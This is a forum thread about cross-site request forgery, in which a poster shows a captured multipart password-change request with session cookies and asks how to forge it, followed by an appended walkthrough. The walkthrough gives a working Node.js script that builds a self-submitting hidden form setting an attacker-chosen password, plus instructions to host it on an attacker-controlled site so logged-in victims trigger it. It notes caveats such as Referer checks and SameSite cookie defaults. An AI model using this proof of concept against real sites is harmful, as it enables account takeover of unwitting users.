Q and A on cross-site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For session fixation, hijacking, lockout, replay, session riding, etc.
CSRF
Posted by: Bob
Date: June 18, 2013 08:06AM

I'm aware of traditional CSRF, but I'm not sure how to do this.
I have monitored the process when changing passwords (the old password is not required) and was able to capture the following:
Host: www.example.com
User-Agent:xxx/1.0 (xx xx 9.2; rv:30.0) L/39483 example/282.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://www.example.com/forums/profile/edit.html
Cookie: __cfduid=c785f77dc868d9fe17b119ad0e3eac2991371422067; d17abfb453ek8801d2cd917536ac8bd7=595B+5+A4A1758+85C461142+14A+B59+E5111+P1159+6+7137814124B105A15+259+D1241+5114311+B165546+316+252+C+916+451+6+1+7+154597940+C1753138995E541040+B1B; a65d776dedkk5dccb94f98e7e93b1d448=e68jop28oe7oimevc36e7fvds9; currentURI=http%3A%2F%2Fwww.example.com%2Fcomponent%2Fcommunity%2F; activeProfile=5834
X-Forwarded-For: example
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------176632722112932
Content-Length: 3674

Post content:
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="name"\r\n
\r\n
example\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="email"\r\n
\r\n
example@example.com\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="password"\r\n
\r\n
mypassword!\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="password2"\r\n
\r\n
mypassword!\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="personaltext"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="birthdate1"\r\n
\r\n
0001\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="birthdate2"\r\n
\r\n
01\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="birthdate3"\r\n
\r\n
01\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="location"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="gender"\r\n
\r\n
0\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="websitename"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="websiteurl"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="twitter"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="facebook"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="myspace"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="skype"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="linkedin"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="delicious"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="friendfeed"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="digg"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="yim"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="aim"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="gtalk"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="icq"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="msn"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="blogspot"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="flickr"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="bebo"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="signature"\r\n
\r\n
\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="messageordering"\r\n
\r\n
0\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="hidemail"\r\n
\r\n
1\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="showonline"\r\n
\r\n
1\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="option"\r\n
\r\n
lmb\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="func"\r\n
\r\n
profile\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="do"\r\n
\r\n
save\r\n
-----------------------------176632722112932\r\n
Content-Disposition: form-data; name="a5dc770aed01a387d9595329b475n26b3"\r\n
\r\n
1\r\n
-----------------------------176632722112932--\r\n

Re: CSRF
Posted by: Albino
Date: August 23, 2013 10:38AM

This is just like typical CSRF, except you need enctype='multipart/form-data' in your payload form.

-------------------------------------------------------
Research blog

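A worked version of the reply's point, added here as an example and not code from either poster: a small Node.js script that turns the captured field list into an attacker-hosted page whose form carries enctype="multipart/form-data" and submits itself, and that renders the body the victim's browser will send so it can be compared line by line with the capture above. Assumptions, all labelled in the code: the form action is taken to be the Referer URL from the capture (the request line itself is not in the post), the new password is attacker-chosen, the field list is cut down to the entries that matter, and the server is assumed to accept the request with no anti-CSRF check beyond what is in the capture. On that last point, the final field in the capture, a 32-plus-character hex-like name with the value 1, has the shape of a session-bound token; the script flags such fields with a heuristic, because if the server validates it the replayed value will not work and the thread does not address that case.

```javascript
// Added example (not from the original thread): build a CSRF proof-of-concept
// page for a multipart/form-data form, following the reply's advice that the
// payload form must carry enctype="multipart/form-data". The victim's browser
// attaches the session cookie to the cross-site POST on its own.

// Assumed: the form action is the Referer URL from the capture; the actual
// request line was not included in the post.
const ACTION_URL = "http://www.example.com/forums/profile/edit.html";

// Field list taken from the captured request, reduced to the entries that
// matter for a password change. The attacker picks the new password.
const FIELDS = {
  name: "example",
  email: "example@example.com",
  password: "attacker-chosen!",
  password2: "attacker-chosen!",
  option: "lmb",
  func: "profile",
  do: "save",
  a5dc770aed01a387d9595329b475n26b3: "1", // token-like field from the capture
};

// Escape a value for use inside a double-quoted HTML attribute.
function escapeAttr(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Heuristic (this script's own, not from the thread): a field whose name is a
// long hex-like string and whose value is tiny has the shape of a
// session-bound anti-CSRF token. If the server checks it, replaying the
// captured value fails and the PoC below will not work as-is.
function tokenLikeFields(fields) {
  return Object.keys(fields).filter(
    (k) => /^[0-9a-z]{32,}$/.test(k) && String(fields[k]).length <= 4
  );
}

// Build the attacker page: a hidden multipart form that auto-submits on load.
function buildCsrfPoc(action, fields) {
  const inputs = Object.entries(fields)
    .map(([k, v]) => `  <input type="hidden" name="${escapeAttr(k)}" value="${escapeAttr(v)}">`)
    .join("\n");
  return [
    "<!doctype html>",
    "<html><body>",
    `<form id="f" method="POST" action="${escapeAttr(action)}" enctype="multipart/form-data">`,
    inputs,
    "</form>",
    '<script>document.getElementById("f").submit();</script>',
    "</body></html>",
  ].join("\n");
}

// Render the body the browser will send for that form. Each part is
// "--" + boundary, a Content-Disposition line, a blank line, the value, and a
// CRLF; the last boundary is followed by "--". This matches the captured body.
function encodeMultipart(fields, boundary) {
  let body = "";
  for (const [k, v] of Object.entries(fields)) {
    body += `--${boundary}\r\n` +
      `Content-Disposition: form-data; name="${k}"\r\n\r\n` +
      `${v}\r\n`;
  }
  return body + `--${boundary}--\r\n`;
}

// Stand-alone use: warn about token-like fields, then print the PoC page.
const suspectFields = tokenLikeFields(FIELDS);
if (suspectFields.length > 0) {
  console.error("warning: token-like field(s), server may validate them: " + suspectFields.join(", "));
}
console.log(buildCsrfPoc(ACTION_URL, FIELDS));

if (typeof module !== "undefined" && module.exports) {
  module.exports = { ACTION_URL, FIELDS, escapeAttr, tokenLikeFields, buildCsrfPoc, encodeMultipart };
}
```

Run it with node and save the output as an HTML file on an attacker-controlled host; a logged-in victim who opens it has the form posted to the target with their cookies. Two caveats worth keeping in mind: the Referer on the forged request will be the attacker's page, not the edit page shown in the capture, so a server that checks Referer will reject it; and Chromium-based browsers have, since 2020, treated cookies without a SameSite attribute as Lax, which generally keeps them off a cross-site POST like this one, so the original 2013 technique depends on the cookie being sent with SameSite=None or on a browser without that default.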